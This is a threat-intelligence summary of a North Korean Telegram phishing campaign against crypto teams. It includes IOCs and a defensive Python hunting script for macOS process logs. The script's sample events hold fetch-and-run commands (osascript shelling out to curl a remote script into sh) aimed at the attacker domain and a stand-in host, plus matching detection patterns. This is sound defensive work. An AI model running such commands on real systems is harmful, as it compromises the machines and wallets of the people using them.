Analysis of North Korean Hackers’ Targeted Phishing Scams on Telegram

2023-12-06 Slowmist

https://slowmist.medium.com/analysis-of-north-korean-hackers-targeted-phishing-scams-on-telegram-872db3f7392b


SlowMist attributes a Telegram phishing operation against cryptocurrency and DeFi project teams to Lazarus-linked North Korean actors, with activity traced back to 2022. The attackers impersonate reputable investment institutions through fake Telegram accounts, build rapport with a project team over time, and then steer the target into a malicious meeting workflow. One infection path uses meeting-themed domains (the IOC table below lists support.group-meeting.online) to persuade the target to run a location-modifying AppleScript, which in turn fetches and executes a remote script. A second path abuses Calendly custom links to embed a malicious URL in a scheduling page the target already trusts. The activity matters for Web3 defenders because it combines investor impersonation, patient social engineering, and meeting-tool abuse to gain control of a team member's system and, from there, potentially steal funds or wallet-related access.

Indicators of Compromise

Type     Value                               First Seen    Last Seen
IPv4     104.168.137.21                      2023-12-06    2024-07-15
URL      https://support.group-meeting.o…    2023-12-06    2023-12-06
DOMAIN   support.group-meeting.online        2023-12-06    2023-12-06
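A hunt over macOS process-execution telemetry for the two things this page gives a defender to look for: the behaviour in the summary (an AppleScript that shells out to fetch and run a remote script) and the published IOCs in the table. This is an added example, not SlowMist's code or anything from the original article. The one-line event format, the sample event lines, and the use of the `do shell script` plus curl/wget idiom as the behavioural signature are assumptions, since the page does not publish the lure script itself; the truncated URL is deliberately not expanded, and the domain covers it.

```python
"""Hunt macOS process-execution events for the Telegram lure described above.

Two rules:
  1. ioc_match               - a URL host on the command line is a published IOC
  2. applescript_remote_fetch - osascript running `do shell script` that curls/wgets a URL

Event format, sample events and the behavioural idiom are assumptions for this
example; the page does not publish the lure script.
"""
import re
from dataclasses import dataclass

# Published IOCs from the table above. The truncated URL is left out because
# its full value is not on the page; matching the domain covers it.
IOC_DOMAINS = {"support.group-meeting.online"}
IOC_IPS = {"104.168.137.21"}

# Assumed one-line-per-process event format: <ts> uid=<n> parent=<name> cmd="<cmdline>"
EVENT_RE = re.compile(
    r'^(?P<ts>\S+)\s+uid=(?P<uid>\d+)\s+parent=(?P<parent>\S+)\s+cmd="(?P<cmd>.*)"$'
)
RE_URL_HOST = re.compile(r"https?://(?P<host>[A-Za-z0-9.\-]+)", re.I)
RE_OSASCRIPT = re.compile(r"\bosascript\b")
RE_SHELL_OUT = re.compile(r"do shell script", re.I)
# curl/wget followed, within the same command, by a URL
RE_REMOTE_FETCH = re.compile(r"\b(?:curl|wget)\b[^|;&]*https?://", re.I)


@dataclass
class Finding:
    ts: str
    uid: str
    rule: str
    detail: str


def parse_event(line):
    """Return the event fields as a dict, or None for a line that is not an event."""
    m = EVENT_RE.match(line.strip())
    return m.groupdict() if m else None


def evaluate(event):
    """Apply both rules to one parsed event and return its findings."""
    cmd = event["cmd"]
    findings = []
    # Rule 1: any URL host on the command line that is a published IOC
    for host in RE_URL_HOST.findall(cmd):
        if host.lower() in IOC_DOMAINS or host in IOC_IPS:
            findings.append(Finding(event["ts"], event["uid"], "ioc_match", host))
    # Rule 2: AppleScript shelling out to pull remote content (infrastructure-agnostic)
    if RE_OSASCRIPT.search(cmd) and RE_SHELL_OUT.search(cmd) and RE_REMOTE_FETCH.search(cmd):
        findings.append(Finding(event["ts"], event["uid"], "applescript_remote_fetch", cmd))
    return findings


def hunt(lines):
    """Run the rules over an iterable of event lines, skipping unparsable ones."""
    findings = []
    for line in lines:
        event = parse_event(line)
        if event is not None:
            findings.extend(evaluate(event))
    return findings


# Constructed sample telemetry, not real data. Event 1 uses the IOC domain at
# its root because only a truncated URL is published; event 2 is the same idiom
# against an unknown host; events 3 and 4 are benign; event 5 is a plain IOC
# hit with no AppleScript involved.
SAMPLE_EVENTS = r'''
2023-12-06T10:01:22Z uid=501 parent=Terminal cmd="osascript -e 'do shell script \"curl -fsSL https://support.group-meeting.online/ | sh\"'"
2023-12-06T10:03:05Z uid=501 parent=Terminal cmd="osascript -e 'do shell script \"curl -fsSL https://cdn.example.invalid/fix-region.sh | sh\"'"
2023-12-06T10:05:40Z uid=501 parent=ScriptEditor cmd="osascript -e 'display notification \"Build finished\"'"
2023-12-06T10:07:13Z uid=501 parent=zsh cmd="curl -fsSL https://example.com/tools/install.sh -o install.sh"
2023-12-06T10:09:58Z uid=501 parent=zsh cmd="python3 -c 'import urllib.request as u; u.urlopen(\"http://104.168.137.21/\")'"
'''.strip().splitlines()


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.ts} uid={f.uid} {f.rule}: {f.detail}")
```

In practice the event lines would come from an EDR or endpoint process log rather than the constructed sample. The IOC rule is the brittle one: the IP's last-seen date in the table is months after the domain's, and infrastructure rotates, so the behavioural rule (a user-facing AppleScript that shells out to fetch and pipe a remote script) is the one worth keeping long term, with the IOC list refreshed from the source.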
